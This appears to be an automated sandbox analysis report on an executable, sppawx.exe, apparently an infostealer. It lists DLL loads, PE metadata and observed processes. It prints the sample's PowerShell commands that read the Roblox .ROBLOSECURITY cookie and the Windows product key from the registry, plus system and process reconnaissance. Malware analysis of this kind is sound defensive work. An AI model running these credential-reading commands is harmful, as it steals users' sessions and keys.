Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: sppawx.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: sppawx.exe

Static file information: File size 7834524 > 1048576

Source: sppawx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: sppawx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: sppawx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: sppawx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: sppawx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: sppawx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: sppawx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: sppawx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: sppawx.exe, 00000002.00000002.1754174414.00007FFEDDF24000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: sppawx.exe, 00000002.00000002.1756530183.00007FFEED7A1000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.pdbhP source: powershell.exe, 00000044.00000002.1539735870.000001AF3CAE5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: sppawx.exe, 00000002.00000002.1750819292.00007FFEDCBDF000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.pdb source: powershell.exe, 00000044.00000002.1539735870.000001AF3CAE5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: sppawx.exe, 00000002.00000002.1756039277.00007FFEEAFC1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: sppawx.exe, 00000002.00000002.1755706204.00007FFEE6F27000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbEE source: sppawx.exe, 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: sppawx.exe, 00000002.00000002.1752922370.00007FFEDD7E2000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: sppawx.exe, 00000002.00000002.1755415210.00007FFEE44DC000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: sppawx.exe, sppawx.exe, 00000002.00000002.1752922370.00007FFEDD7E2000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: sppawx.exe, 00000002.00000002.1756304635.00007FFEECEC1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: \vp.pdb* source: powershell.exe, 00000044.00000002.1603530749.000001AF5481E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: sppawx.exe, 00000002.00000002.1755415210.00007FFEE44DC000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: sppawx.exe, 00000002.00000002.1755203682.00007FFEDE6A1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: sppawx.exe, 00000000.00000003.1294996044.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1757151271.00007FFEF5CF1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: sppawx.exe, 00000000.00000003.1294996044.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1757151271.00007FFEF5CF1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1752661603.00007FFEDD411000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000067.00000000.1619209555.00007FF625720000.00000002.00000001.01000000.0000001E.sdmp, rar.exe, 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: sppawx.exe, sppawx.exe, 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp

Source: sppawx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: sppawx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: sppawx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: sppawx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: sppawx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline"

Source: C:\Users\user\Desktop\sppawx.exe

Code function: 2_2_00007FFEDCCB7200 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFEDCCB7200

Source: sppawx.exe	Static PE information: real checksum: 0x77743c should be: 0x779c9a
Source: _ctypes.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x169f0
Source: unicodedata.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x53022
Source: _bz2.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x170f7
Source: libffi-8.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: _ssl.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x150ed
Source: vebzhwcp.dll.69.dr	Static PE information: real checksum: 0x0 should be: 0x4771
Source: sqlite3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x9f7df
Source: python312.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1ca53b
Source: libcrypto-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x192b2f
Source: _queue.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xcac1
Source: _socket.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x10668
Source: _decimal.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x226ba
Source: _hashlib.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x9cd5
Source: libssl-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x396d1
Source: select.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x100e6
Source: _lzma.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x23988
Source: _sqlite3.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1149b

Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCAD5CED push rdx; ret	2_2_00007FFEDCAD5CF7
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCAD5CE5 push r8; ret	2_2_00007FFEDCAD5CEB
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCAD5CE0 push r10; retf	2_2_00007FFEDCAD5CE2
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD23D8E0 push rsp; retf	2_2_00007FFEDD23D8E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFE7B24D2A5 pushad ; iretd	11_2_00007FFE7B24D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFE7B367BD6 push esp; ret	11_2_00007FFE7B367BD9
